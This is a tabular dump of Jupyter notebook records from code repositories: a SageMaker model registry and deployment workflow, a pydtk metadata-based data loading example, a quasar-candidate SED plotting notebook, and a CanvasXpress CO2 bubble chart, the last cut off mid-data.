hexsha
stringlengths 40
40
| size
int64 6
14.9M
| ext
stringclasses 1
value | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 6
260
| max_stars_repo_name
stringlengths 6
119
| max_stars_repo_head_hexsha
stringlengths 40
41
| max_stars_repo_licenses
list | max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 6
260
| max_issues_repo_name
stringlengths 6
119
| max_issues_repo_head_hexsha
stringlengths 40
41
| max_issues_repo_licenses
list | max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 6
260
| max_forks_repo_name
stringlengths 6
119
| max_forks_repo_head_hexsha
stringlengths 40
41
| max_forks_repo_licenses
list | max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | avg_line_length
float64 2
1.04M
| max_line_length
int64 2
11.2M
| alphanum_fraction
float64 0
1
| cells
list | cell_types
list | cell_type_groups
list |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cb289cc8fb59d26c11729e08f53e976389e77303 | 11,383 | ipynb | Jupyter Notebook | 00_quickstart/12_Register_Deploy_Model.ipynb | NRauschmayr/workshop | c890e38a5f4a339540697206ebdea479e66534e5 | [
"Apache-2.0"
] | null | null | null | 00_quickstart/12_Register_Deploy_Model.ipynb | NRauschmayr/workshop | c890e38a5f4a339540697206ebdea479e66534e5 | [
"Apache-2.0"
] | null | null | null | 00_quickstart/12_Register_Deploy_Model.ipynb | NRauschmayr/workshop | c890e38a5f4a339540697206ebdea479e66534e5 | [
"Apache-2.0"
] | null | null | null | 26.720657 | 254 | 0.571993 | [
[
[
"# Deploy the Model\n\nThe pipeline that was executed created a Model Package version within the specified Model Package Group. Of particular note, the registration of the model/creation of the Model Package was done so with approval status as `PendingManualApproval`.\n\nAs part of SageMaker Pipelines, data scientists can register the model with approved/pending manual approval as part of the CI/CD workflow.\n\nWe can also approve the model using the SageMaker Studio UI or programmatically as shown below.",
"_____no_output_____"
]
],
[
[
"from botocore.exceptions import ClientError\n\nimport os\nimport sagemaker\nimport logging\nimport boto3\nimport sagemaker\nimport pandas as pd\n\nsess = sagemaker.Session()\nbucket = sess.default_bucket()\nrole = sagemaker.get_execution_role()\nregion = boto3.Session().region_name\n\nsm = boto3.Session().client(service_name=\"sagemaker\", region_name=region)",
"_____no_output_____"
],
[
"%store -r pipeline_name",
"_____no_output_____"
],
[
"print(pipeline_name)",
"_____no_output_____"
],
[
"%%time\n\nimport time\nfrom pprint import pprint\n\nexecutions_response = sm.list_pipeline_executions(PipelineName=pipeline_name)[\"PipelineExecutionSummaries\"]\npipeline_execution_status = executions_response[0][\"PipelineExecutionStatus\"]\nprint(pipeline_execution_status)\n\nwhile pipeline_execution_status == \"Executing\":\n try:\n executions_response = sm.list_pipeline_executions(PipelineName=pipeline_name)[\"PipelineExecutionSummaries\"]\n pipeline_execution_status = executions_response[0][\"PipelineExecutionStatus\"]\n # print('Executions for our pipeline...')\n # print(pipeline_execution_status)\n except Exception as e:\n print(\"Please wait...\")\n time.sleep(30)\n\npprint(executions_response)",
"_____no_output_____"
]
],
[
[
"# List Pipeline Execution Steps\n",
"_____no_output_____"
]
],
[
[
"pipeline_execution_status = executions_response[0][\"PipelineExecutionStatus\"]\nprint(pipeline_execution_status)",
"_____no_output_____"
],
[
"pipeline_execution_arn = executions_response[0][\"PipelineExecutionArn\"]\nprint(pipeline_execution_arn)",
"_____no_output_____"
],
[
"from pprint import pprint\n\nsteps = sm.list_pipeline_execution_steps(PipelineExecutionArn=pipeline_execution_arn)\n\npprint(steps)",
"_____no_output_____"
]
],
[
[
"# View Registered Model",
"_____no_output_____"
]
],
[
[
"for execution_step in steps[\"PipelineExecutionSteps\"]:\n if execution_step[\"StepName\"] == \"RegisterModel\":\n model_package_arn = execution_step[\"Metadata\"][\"RegisterModel\"][\"Arn\"]\n break\nprint(model_package_arn)",
"_____no_output_____"
],
[
"model_package_update_response = sm.update_model_package(\n ModelPackageArn=model_package_arn,\n ModelApprovalStatus=\"Approved\", # Other options are Rejected and PendingManualApproval\n)",
"_____no_output_____"
]
],
[
[
"# View Created Model",
"_____no_output_____"
]
],
[
[
"for execution_step in steps[\"PipelineExecutionSteps\"]:\n if execution_step[\"StepName\"] == \"CreateModel\":\n model_arn = execution_step[\"Metadata\"][\"Model\"][\"Arn\"]\n break\nprint(model_arn)\n\nmodel_name = model_arn.split(\"/\")[-1]\nprint(model_name)",
"_____no_output_____"
]
],
[
[
"# Create Model Endpoint from Model Registry\nMore details here: https://docs.aws.amazon.com/sagemaker/latest/dg/model-registry-deploy.html\n",
"_____no_output_____"
]
],
[
[
"import time\n\ntimestamp = int(time.time())\n\nmodel_from_registry_name = \"bert-model-from-registry-{}\".format(timestamp)\nprint(\"Model from registry name : {}\".format(model_from_registry_name))\n\nmodel_registry_package_container = {\n \"ModelPackageName\": model_package_arn,\n}",
"_____no_output_____"
],
[
"from pprint import pprint\n\ncreate_model_from_registry_respose = sm.create_model(\n ModelName=model_from_registry_name, ExecutionRoleArn=role, PrimaryContainer=model_registry_package_container\n)\npprint(create_model_from_registry_respose)",
"_____no_output_____"
],
[
"model_from_registry_arn = create_model_from_registry_respose[\"ModelArn\"]\nmodel_from_registry_arn",
"_____no_output_____"
],
[
"endpoint_config_name = \"bert-model-from-registry-epc-{}\".format(timestamp)\nprint(endpoint_config_name)\n\ncreate_endpoint_config_response = sm.create_endpoint_config(\n EndpointConfigName=endpoint_config_name,\n ProductionVariants=[\n {\n \"InstanceType\": \"ml.m4.xlarge\", \n \"InitialVariantWeight\": 1,\n \"InitialInstanceCount\": 1,\n \"ModelName\": model_name,\n \"VariantName\": \"AllTraffic\",\n }\n ],\n)",
"_____no_output_____"
],
[
"pipeline_endpoint_name = \"bert-model-from-registry-ep-{}\".format(timestamp)\nprint(\"EndpointName={}\".format(pipeline_endpoint_name))\n\n# create_endpoint_response = sm.create_endpoint(\n# EndpointName=pipeline_endpoint_name, EndpointConfigName=endpoint_config_name\n# )\n# print(create_endpoint_response[\"EndpointArn\"])",
"_____no_output_____"
],
[
"# from IPython.core.display import display, HTML\n\n# display(\n# HTML(\n# '<b>Review <a target=\"blank\" href=\"https://console.aws.amazon.com/sagemaker/home?region={}#/endpoints/{}\">SageMaker REST Endpoint</a></b>'.format(\n# region, pipeline_endpoint_name\n# )\n# )\n# )",
"_____no_output_____"
],
[
"%store pipeline_endpoint_name",
"_____no_output_____"
]
],
[
[
"# _Wait Until the Endpoint is Deployed_",
"_____no_output_____"
]
],
[
[
"# %%time\n\n# waiter = sm.get_waiter(\"endpoint_in_service\")\n# waiter.wait(EndpointName=pipeline_endpoint_name)",
"_____no_output_____"
]
],
[
[
"# _Wait Until the Endpoint ^^ Above ^^ is Deployed_",
"_____no_output_____"
],
[
"# Predict the star_rating with Ad Hoc review_body Samples¶",
"_____no_output_____"
]
],
[
[
"# import json\n# from sagemaker.tensorflow.model import TensorFlowPredictor\n# from sagemaker.serializers import JSONLinesSerializer\n# from sagemaker.deserializers import JSONLinesDeserializer\n\n# predictor = TensorFlowPredictor(\n# endpoint_name=pipeline_endpoint_name,\n# sagemaker_session=sess,\n# model_name=\"saved_model\",\n# model_version=0,\n# accept_type=\"application/jsonlines\",\n# serializer=JSONLinesSerializer(),\n# deserializer=JSONLinesDeserializer(),\n# )",
"_____no_output_____"
],
[
"# inputs = [{\"features\": [\"This is great!\"]}, {\"features\": [\"This is bad.\"]}]\n\n# predicted_classes = predictor.predict(inputs)\n\n# for predicted_class in predicted_classes:\n# print(\"Predicted star_rating: {}\".format(predicted_class))",
"_____no_output_____"
]
],
[
[
"# Release Resources",
"_____no_output_____"
]
],
[
[
"# sm.delete_endpoint(\n# EndpointName=pipeline_endpoint_name\n# )",
"_____no_output_____"
],
[
"%%html\n\n<p><b>Shutting down your kernel for this notebook to release resources.</b></p>\n<button class=\"sm-command-button\" data-commandlinker-command=\"kernelmenu:shutdown\" style=\"display:none;\">Shutdown Kernel</button>\n\n<script>\ntry {\n els = document.getElementsByClassName(\"sm-command-button\");\n els[0].click();\n}\ncatch(err) {\n // NoOp\n} \n</script>",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb28b5c5e4d0827f4cc4acb77ba48e3146835c24 | 6,677 | ipynb | Jupyter Notebook | examples/02_grab_data_based_on_metadata.ipynb | dataware-tools/pydtk | 1da61fb8ca90de6c39a371a9b2b65f4473932991 | [
"Apache-2.0"
] | 11 | 2020-10-09T01:29:18.000Z | 2022-01-21T13:21:40.000Z | examples/02_grab_data_based_on_metadata.ipynb | dataware-tools/pydtk | 1da61fb8ca90de6c39a371a9b2b65f4473932991 | [
"Apache-2.0"
] | 64 | 2020-10-20T04:55:22.000Z | 2022-01-24T15:52:32.000Z | examples/02_grab_data_based_on_metadata.ipynb | dataware-tools/pydtk | 1da61fb8ca90de6c39a371a9b2b65f4473932991 | [
"Apache-2.0"
] | 1 | 2021-07-30T04:52:38.000Z | 2021-07-30T04:52:38.000Z | 23.510563 | 116 | 0.473117 | [
[
[
"# Example 2: Grab data based on metadata\n\nIn this example, we will learn how to grab the actual data based on metadata.",
"_____no_output_____"
],
[
"## Filter metadata\n\nJust like how we have done in the previous example, let's search for files containing `camera/front-center`.",
"_____no_output_____"
]
],
[
[
"import os\nfrom pydtk.db import DBHandler\n\ndb_handler = DBHandler(\n db_class='meta',\n db_host='./example_db',\n base_dir_path='../test'\n)\ndb_handler.read(pql='\"contents.camera/front-center\" == exists(True)')\ndb_handler.content_df\n",
"_____no_output_____"
]
],
[
[
"Note that metadata here is associated to each file containing the actual data. \nThus, if a file has more than one contents (e.g., A rosbag file can store multiple signals), \nthen those which are other than `camera/front-center` are also retrieved.\n",
"_____no_output_____"
],
[
"## Iterate metadata\n\nYou can get metadata one-by-one as `DBHandler` works as an iterator. \nTo get a sample, just use `next()` method. \nMetadata will be returned as a dict.",
"_____no_output_____"
]
],
[
[
"sample = next(db_handler)\nsample",
"_____no_output_____"
]
],
[
[
"## Grab data\n\nBased on the metadata, we can grab the actual data as a numpy array from the corresponding file. \n`BaseFileReader` automatically chooses an appropriate model to load the file based on the given metadata. \nThus, you can simple call `read` function to grab data as follows.",
"_____no_output_____"
]
],
[
[
"from pydtk.io import BaseFileReader, NoModelMatchedError\n\nreader = BaseFileReader()\n\ntry:\n timestamps, data, columns = reader.read(sample)\n print('# of frames: {}'.format(len(timestamps)))\nexcept NoModelMatchedError as e:\n print(str(e))",
"WARNING:root:Failed to load models in autoware\nWARNING:root:Failed to load models in movie.py\nWARNING:root:Failed to load models in rosbag.py\n"
]
],
[
[
"Let's check the ndarray.",
"_____no_output_____"
]
],
[
[
"timestamps?",
"_____no_output_____"
],
[
"data?",
"_____no_output_____"
],
[
"columns?",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb28cf23e9dbc649e046f6857af7d13fa2322069 | 64,086 | ipynb | Jupyter Notebook | highz_clustering/clustering/Data_Sets/Candidate_SED.ipynb | JDTimlin/QSO_Clustering | 6f4b9e8dcf4d972044c24333b5d57cab679d2bd6 | [
"MIT"
] | 1 | 2018-08-07T19:41:24.000Z | 2018-08-07T19:41:24.000Z | highz_clustering/clustering/Data_Sets/Candidate_SED.ipynb | JDTimlin/QSO_Clustering | 6f4b9e8dcf4d972044c24333b5d57cab679d2bd6 | [
"MIT"
] | null | null | null | highz_clustering/clustering/Data_Sets/Candidate_SED.ipynb | JDTimlin/QSO_Clustering | 6f4b9e8dcf4d972044c24333b5d57cab679d2bd6 | [
"MIT"
] | null | null | null | 233.04 | 15,472 | 0.916612 | [
[
[
"%matplotlib inline\nimport numpy as np\nfrom astropy.io import fits as pf\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"#open the candidate file\n\ndfile = 'QSO_Candidates_Final_Clustering_Set.fits'\n\ndata = pf.open(dfile)[1].data\n\n",
"_____no_output_____"
],
[
"#Separate the 7 colors into arrays\n\nu = data['ug'] + data ['gr'] + data['ri'] + data['imag']\ng = data ['gr'] + data['ri'] + data['imag']\nr = data['ri'] + data['imag']\ni = data['imag']\nz = data['imag'] - data['iz']\ns1= data['imag'] - (data['zs1'] + data['iz'])\ns2= data['imag'] - (data['s1s2'] + data['zs1'] + data['iz'])\n\nfu = data['PSFFLUX'][:,0]\nfg = data['PSFFLUX'][:,1]\nfr = data['PSFFLUX'][:,2]\nfi = data['PSFFLUX'][:,3]\nfz = data['PSFFLUX'][:,4]\nfs1= data['CH'][:,0]\nfs2= data['CH'][:,1]\n\nprint len(fu)",
"9076\n"
],
[
"u = u[:, np.newaxis]\ng = g[:, np.newaxis]\nr = r[:, np.newaxis]\ni = i[:, np.newaxis]\nz = z[:, np.newaxis]\ns1= s1[:, np.newaxis]\ns2= s2[:, np.newaxis]\n\nfu = fu[:, np.newaxis]\nfg = fg[:, np.newaxis]\nfr = fr[:, np.newaxis]\nfi = fi[:, np.newaxis]\nfz = fz[:, np.newaxis]\nfs1= fs1[:, np.newaxis]\nfs2= fs2[:, np.newaxis]",
"_____no_output_____"
],
[
"colarray = np.hstack([u,g,r,i,z,s1,s2])\nflxarray = np.hstack([fu,fg,fr,fi,fz,fs1,fs2])",
"_____no_output_____"
],
[
"bandpass = [3543, 4770, 6231, 7625, 9134, 36000, 45000]\n",
"_____no_output_____"
],
[
"plt.figure(1)\nfor i in range(1000):\n plt.scatter(bandpass, colarray[i],s=1)\n\nplt.xscale('log')\nplt.show()\n\n",
"_____no_output_____"
],
[
"bdx = (data['Vis_insp'] == 0)\n\ngalaxies = colarray[bdx]\ngalflux = flxarray[bdx]",
"_____no_output_____"
],
[
"plt.figure(2)\nfor i in range(len(galaxies)):\n plt.scatter(bandpass, galaxies[i],s=1)\n\nplt.xscale('log')\nplt.show()\n",
"_____no_output_____"
],
[
"plt.figure(3)\nfor i in range(1000):\n plt.scatter(bandpass, flxarray[i],s=1)\n\nplt.xscale('log')\nplt.yscale('log')\nplt.show()",
"_____no_output_____"
],
[
"plt.figure(4)\nfor i in range(len(galflux)):\n plt.scatter(bandpass, galflux[i],s=1)\n\nplt.xscale('log')\nplt.yscale('log')\nplt.show()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb28fc30e5a20c165e7bdb093233a94d7ef2a2a5 | 29,278 | ipynb | Jupyter Notebook | tutorials/notebook/cx_site_chart_examples/bubble_4.ipynb | docinfosci/canvasxpress-python | 532a981b04d0f50bbde1852c695117a6220f4589 | [
"MIT"
] | 4 | 2021-03-18T17:23:40.000Z | 2022-02-01T19:07:01.000Z | tutorials/notebook/cx_site_chart_examples/bubble_4.ipynb | docinfosci/canvasxpress-python | 532a981b04d0f50bbde1852c695117a6220f4589 | [
"MIT"
] | 8 | 2021-04-30T20:46:57.000Z | 2022-03-10T07:25:31.000Z | tutorials/notebook/cx_site_chart_examples/bubble_4.ipynb | docinfosci/canvasxpress-python | 532a981b04d0f50bbde1852c695117a6220f4589 | [
"MIT"
] | 1 | 2022-02-03T00:35:14.000Z | 2022-02-03T00:35:14.000Z | 29,278 | 29,278 | 0.246055 | [
[
[
"# Example: CanvasXpress bubble Chart No. 4\n\nThis example page demonstrates how to, using the Python package, create a chart that matches the CanvasXpress online example located at:\n\nhttps://www.canvasxpress.org/examples/bubble-4.html\n\nThis example is generated using the reproducible JSON obtained from the above page and the `canvasxpress.util.generator.generate_canvasxpress_code_from_json_file()` function.\n\nEverything required for the chart to render is included in the code below. Simply run the code block.",
"_____no_output_____"
]
],
[
[
"from canvasxpress.canvas import CanvasXpress \nfrom canvasxpress.js.collection import CXEvents \nfrom canvasxpress.render.jupyter import CXNoteBook \n\ncx = CanvasXpress(\n render_to=\"bubble4\",\n data={\n \"y\": {\n \"vars\": [\n \"CO2\"\n ],\n \"smps\": [\n \"AFG\",\n \"ALB\",\n \"DZA\",\n \"AND\",\n \"AGO\",\n \"AIA\",\n \"ATG\",\n \"ARG\",\n \"ARM\",\n \"ABW\",\n \"AUS\",\n \"AUT\",\n \"AZE\",\n \"BHS\",\n \"BHR\",\n \"BGD\",\n \"BRB\",\n \"BLR\",\n \"BEL\",\n \"BLZ\",\n \"BEN\",\n \"BMU\",\n \"BTN\",\n \"BOL\",\n \"BIH\",\n \"BWA\",\n \"BRA\",\n \"VGB\",\n \"BRN\",\n \"BGR\",\n \"BFA\",\n \"BDI\",\n \"KHM\",\n \"CMR\",\n \"CAN\",\n \"CPV\",\n \"CAF\",\n \"TCD\",\n \"CHL\",\n \"CHN\",\n \"COL\",\n \"COM\",\n \"COG\",\n \"COK\",\n \"CRI\",\n \"HRV\",\n \"CUB\",\n \"CYP\",\n \"CZE\",\n \"COD\",\n \"DNK\",\n \"DJI\",\n \"DOM\",\n \"ECU\",\n \"EGY\",\n \"SLV\",\n \"GNQ\",\n \"ERI\",\n \"EST\",\n \"ETH\",\n \"FJI\",\n \"FIN\",\n \"FRA\",\n \"PYF\",\n \"GAB\",\n \"GMB\",\n \"GEO\",\n \"DEU\",\n \"GHA\",\n \"GRC\",\n \"GRL\",\n \"GRD\",\n \"GTM\",\n \"GIN\",\n \"GNB\",\n \"GUY\",\n \"HTI\",\n \"HND\",\n \"HKG\",\n \"HUN\",\n \"ISL\",\n \"IND\",\n \"IDN\",\n \"IRN\",\n \"IRQ\",\n \"IRL\",\n \"ISR\",\n \"ITA\",\n \"JAM\",\n \"JPN\",\n \"JOR\",\n \"KAZ\",\n \"KEN\",\n \"KIR\",\n \"KWT\",\n \"KGZ\",\n \"LAO\",\n \"LVA\",\n \"LBN\",\n \"LSO\",\n \"LBR\",\n \"LBY\",\n \"LIE\",\n \"LTU\",\n \"LUX\",\n \"MAC\",\n \"MDG\",\n \"MWI\",\n \"MYS\",\n \"MDV\",\n \"MLI\",\n \"MLT\",\n \"MHL\",\n \"MRT\",\n \"MUS\",\n \"MEX\",\n \"MDA\",\n \"MNG\",\n \"MNE\",\n \"MAR\",\n \"MOZ\",\n \"MMR\",\n \"NAM\",\n \"NRU\",\n \"NPL\",\n \"NLD\",\n \"NCL\",\n \"NZL\",\n \"NIC\",\n \"NER\",\n \"NGA\",\n \"NIU\",\n \"PRK\",\n \"MKD\",\n \"NOR\",\n \"OMN\",\n \"PAK\",\n \"PAN\",\n \"PNG\",\n \"PRY\",\n \"PER\",\n \"PHL\",\n \"POL\",\n \"PRT\",\n \"QAT\",\n \"ROU\",\n \"RUS\",\n \"RWA\",\n \"SHN\",\n \"KNA\",\n \"LCA\",\n \"SPM\",\n \"VCT\",\n \"WSM\",\n \"STP\",\n \"SAU\",\n \"SRB\",\n \"SYC\",\n \"SLE\",\n \"SGP\",\n \"SVK\",\n \"SVN\",\n \"SLB\",\n \"SOM\",\n \"KOR\",\n \"SSD\",\n \"ESP\",\n \"LKA\",\n \"SDN\",\n \"SUR\",\n \"SWE\",\n \"CHE\",\n \"SYR\",\n \"TWN\",\n \"TJK\",\n \"TZA\",\n \"THA\",\n \"TLS\",\n \"TGO\",\n \"TON\",\n \"TTO\",\n \"TUN\",\n \"TUR\",\n \"TKM\",\n \"TUV\",\n \"UGA\",\n \"UKR\",\n \"ARE\",\n \"GBR\",\n \"USA\",\n \"URY\",\n \"UZB\",\n \"VUT\",\n \"VEN\",\n \"VNM\",\n \"YEM\",\n \"ZMB\",\n \"ZWE\"\n ],\n \"data\": [\n [\n 10.452666,\n 5.402999,\n 164.309295,\n 0.46421,\n 37.678605,\n 0.147145,\n 0.505574,\n 185.029897,\n 6.296603,\n 0.943234,\n 415.953947,\n 66.719678,\n 37.488394,\n 2.03001,\n 31.594487,\n 85.718805,\n 1.207134,\n 61.871676,\n 100.207836,\n 0.612205,\n 7.759753,\n 0.648945,\n 1.662172,\n 22.345503,\n 22.086102,\n 6.815418,\n 466.649304,\n 0.173555,\n 9.560399,\n 43.551599,\n 4.140342,\n 0.568028,\n 15.479031,\n 7.566796,\n 586.504635,\n 0.609509,\n 0.300478,\n 1.008035,\n 85.829114,\n 9956.568523,\n 92.228209,\n 0.245927,\n 3.518309,\n 0.072706,\n 8.249118,\n 17.718646,\n 26.084446,\n 7.332762,\n 104.411211,\n 2.231343,\n 34.65143,\n 0.389975,\n 25.305221,\n 41.817989,\n 251.460913,\n 6.018265,\n 5.90578,\n 0.708769,\n 17.710953,\n 16.184949,\n 2.123769,\n 45.849349,\n 331.725446,\n 0.780633,\n 4.803117,\n 0.56324,\n 9.862173,\n 755.362342,\n 14.479998,\n 71.797869,\n 0.511728,\n 0.278597,\n 19.411335,\n 3.032114,\n 0.308612,\n 2.342628,\n 3.366964,\n 10.470701,\n 42.505723,\n 49.628491,\n 3.674529,\n 2591.323739,\n 576.58439,\n 755.402186,\n 211.270294,\n 38.803394,\n 62.212641,\n 348.085029,\n 8.009662,\n 1135.688,\n 24.923803,\n 319.647412,\n 17.136703,\n 0.068879,\n 104.217567,\n 10.16888,\n 32.26245,\n 7.859287,\n 27.565431,\n 2.425558,\n 1.27446,\n 45.205986,\n 0.14375,\n 13.669492,\n 9.56852,\n 2.216456,\n 4.187806,\n 1.470252,\n 249.144498,\n 1.565092,\n 3.273276,\n 1.531581,\n 0.153065,\n 3.934804,\n 4.901611,\n 451.080829,\n 5.877784,\n 64.508256,\n 2.123147,\n 65.367444,\n 8.383478,\n 26.095603,\n 4.154302,\n 0.049746,\n 13.410432,\n 160.170147,\n 8.20904,\n 35.080341,\n 5.377193,\n 2.093847,\n 136.078346,\n 0.007653,\n 38.162935,\n 6.980909,\n 43.817657,\n 71.029916,\n 247.425382,\n 12.096333,\n 6.786146,\n 8.103032,\n 54.210259,\n 138.924391,\n 337.705742,\n 51.482481,\n 109.24468,\n 76.951219,\n 1691.360426,\n 1.080098,\n 0.011319,\n 0.249014,\n 0.362202,\n 0.079232,\n 0.264106,\n 0.267864,\n 0.126126,\n 576.757836,\n 46.0531,\n 0.60536,\n 0.987559,\n 38.28806,\n 36.087837,\n 14.487844,\n 0.298477,\n 0.658329,\n 634.934068,\n 1.539884,\n 269.654254,\n 22.973233,\n 22.372399,\n 2.551817,\n 41.766183,\n 36.895485,\n 25.877689,\n 273.104667,\n 7.473265,\n 11.501889,\n 292.452995,\n 0.520422,\n 3.167303,\n 0.164545,\n 37.865571,\n 30.357093,\n 419.194747,\n 78.034724,\n 0.01148,\n 5.384767,\n 231.694165,\n 188.541366,\n 380.138559,\n 5424.881502,\n 6.251839,\n 113.93837,\n 0.145412,\n 129.596274,\n 211.774129,\n 9.945288,\n 6.930094,\n 11.340575\n ]\n ]\n },\n \"x\": {\n \"Country\": [\n \"Afghanistan\",\n \"Albania\",\n \"Algeria\",\n \"Andorra\",\n \"Angola\",\n \"Anguilla\",\n \"Antigua and Barbuda\",\n \"Argentina\",\n \"Armenia\",\n \"Aruba\",\n \"Australia\",\n \"Austria\",\n \"Azerbaijan\",\n \"Bahamas\",\n \"Bahrain\",\n \"Bangladesh\",\n \"Barbados\",\n \"Belarus\",\n \"Belgium\",\n \"Belize\",\n \"Benin\",\n \"Bermuda\",\n \"Bhutan\",\n \"Bolivia\",\n \"Bosnia and Herzegovina\",\n \"Botswana\",\n \"Brazil\",\n \"British Virgin Islands\",\n \"Brunei\",\n \"Bulgaria\",\n \"Burkina Faso\",\n \"Burundi\",\n \"Cambodia\",\n \"Cameroon\",\n \"Canada\",\n \"Cape Verde\",\n \"Central African Republic\",\n \"Chad\",\n \"Chile\",\n \"China\",\n \"Colombia\",\n \"Comoros\",\n \"Congo\",\n \"Cook Islands\",\n \"Costa Rica\",\n \"Croatia\",\n \"Cuba\",\n \"Cyprus\",\n \"Czechia\",\n \"Democratic Republic of Congo\",\n \"Denmark\",\n \"Djibouti\",\n \"Dominican Republic\",\n \"Ecuador\",\n \"Egypt\",\n \"El Salvador\",\n \"Equatorial Guinea\",\n \"Eritrea\",\n \"Estonia\",\n \"Ethiopia\",\n \"Fiji\",\n \"Finland\",\n \"France\",\n \"French Polynesia\",\n \"Gabon\",\n \"Gambia\",\n \"Georgia\",\n \"Germany\",\n \"Ghana\",\n \"Greece\",\n \"Greenland\",\n \"Grenada\",\n \"Guatemala\",\n \"Guinea\",\n \"Guinea-Bissau\",\n \"Guyana\",\n \"Haiti\",\n \"Honduras\",\n \"Hong Kong\",\n \"Hungary\",\n \"Iceland\",\n \"India\",\n \"Indonesia\",\n \"Iran\",\n \"Iraq\",\n \"Ireland\",\n \"Israel\",\n \"Italy\",\n \"Jamaica\",\n \"Japan\",\n \"Jordan\",\n \"Kazakhstan\",\n \"Kenya\",\n \"Kiribati\",\n \"Kuwait\",\n \"Kyrgyzstan\",\n \"Laos\",\n \"Latvia\",\n \"Lebanon\",\n \"Lesotho\",\n \"Liberia\",\n \"Libya\",\n \"Liechtenstein\",\n \"Lithuania\",\n \"Luxembourg\",\n \"Macao\",\n \"Madagascar\",\n \"Malawi\",\n \"Malaysia\",\n \"Maldives\",\n \"Mali\",\n \"Malta\",\n \"Marshall Islands\",\n \"Mauritania\",\n \"Mauritius\",\n \"Mexico\",\n \"Moldova\",\n \"Mongolia\",\n \"Montenegro\",\n \"Morocco\",\n \"Mozambique\",\n \"Myanmar\",\n \"Namibia\",\n \"Nauru\",\n \"Nepal\",\n \"Netherlands\",\n \"New Caledonia\",\n \"New Zealand\",\n \"Nicaragua\",\n \"Niger\",\n \"Nigeria\",\n \"Niue\",\n \"North Korea\",\n \"North Macedonia\",\n \"Norway\",\n \"Oman\",\n \"Pakistan\",\n \"Panama\",\n \"Papua New Guinea\",\n \"Paraguay\",\n \"Peru\",\n \"Philippines\",\n \"Poland\",\n \"Portugal\",\n \"Qatar\",\n \"Romania\",\n \"Russia\",\n \"Rwanda\",\n \"Saint Helena\",\n \"Saint Kitts and Nevis\",\n \"Saint Lucia\",\n \"Saint Pierre and Miquelon\",\n \"Saint Vincent and the Grenadines\",\n \"Samoa\",\n \"Sao Tome and Principe\",\n \"Saudi Arabia\",\n \"Serbia\",\n \"Seychelles\",\n \"Sierra Leone\",\n \"Singapore\",\n \"Slovakia\",\n \"Slovenia\",\n \"Solomon Islands\",\n \"Somalia\",\n \"South Korea\",\n \"South Sudan\",\n \"Spain\",\n \"Sri Lanka\",\n \"Sudan\",\n \"Suriname\",\n \"Sweden\",\n \"Switzerland\",\n \"Syria\",\n \"Taiwan\",\n \"Tajikistan\",\n \"Tanzania\",\n \"Thailand\",\n \"Timor\",\n \"Togo\",\n \"Tonga\",\n \"Trinidad and Tobago\",\n \"Tunisia\",\n \"Turkey\",\n \"Turkmenistan\",\n \"Tuvalu\",\n \"Uganda\",\n \"Ukraine\",\n \"United Arab Emirates\",\n \"United Kingdom\",\n \"United States\",\n \"Uruguay\",\n \"Uzbekistan\",\n \"Vanuatu\",\n \"Venezuela\",\n \"Vietnam\",\n \"Yemen\",\n \"Zambia\",\n \"Zimbabwe\"\n ],\n \"Continent\": [\n \"Asia\",\n \"Europe\",\n \"Africa\",\n \"Europe\",\n \"Africa\",\n \"North America\",\n \"North America\",\n \"South America\",\n \"Asia\",\n \"North America\",\n \"Oceania\",\n \"Europe\",\n \"Europe\",\n \"North America\",\n \"Asia\",\n \"Asia\",\n \"North America\",\n \"Europe\",\n \"Europe\",\n \"North America\",\n \"Africa\",\n \"North America\",\n \"Asia\",\n \"South America\",\n \"Europe\",\n \"Africa\",\n \"South America\",\n \"North America\",\n \"Asia\",\n \"Europe\",\n \"Africa\",\n \"Africa\",\n \"Asia\",\n \"Africa\",\n \"North America\",\n \"Africa\",\n \"Africa\",\n \"Africa\",\n \"South America\",\n \"Asia\",\n \"South America\",\n \"Africa\",\n \"Africa\",\n \"Oceania\",\n \"Central America\",\n \"Europe\",\n \"North America\",\n \"Europe\",\n \"Europe\",\n \"Africa\",\n \"Europe\",\n \"Africa\",\n \"North America\",\n \"South America\",\n \"Africa\",\n \"Central America\",\n \"Africa\",\n \"Africa\",\n \"Europe\",\n \"Africa\",\n \"Oceania\",\n \"Europe\",\n \"Europe\",\n \"Oceania\",\n \"Africa\",\n \"Africa\",\n \"Asia\",\n \"Europe\",\n \"Africa\",\n \"Europe\",\n \"North America\",\n \"North America\",\n \"Central America\",\n \"Africa\",\n \"Africa\",\n \"South America\",\n \"North America\",\n \"Central America\",\n \"Asia\",\n \"Europe\",\n \"Europe\",\n \"Asia\",\n \"Asia\",\n \"Asia\",\n \"Asia\",\n \"Europe\",\n \"Asia\",\n \"Europe\",\n \"North America\",\n \"Asia\",\n \"Asia\",\n \"Asia\",\n \"Africa\",\n 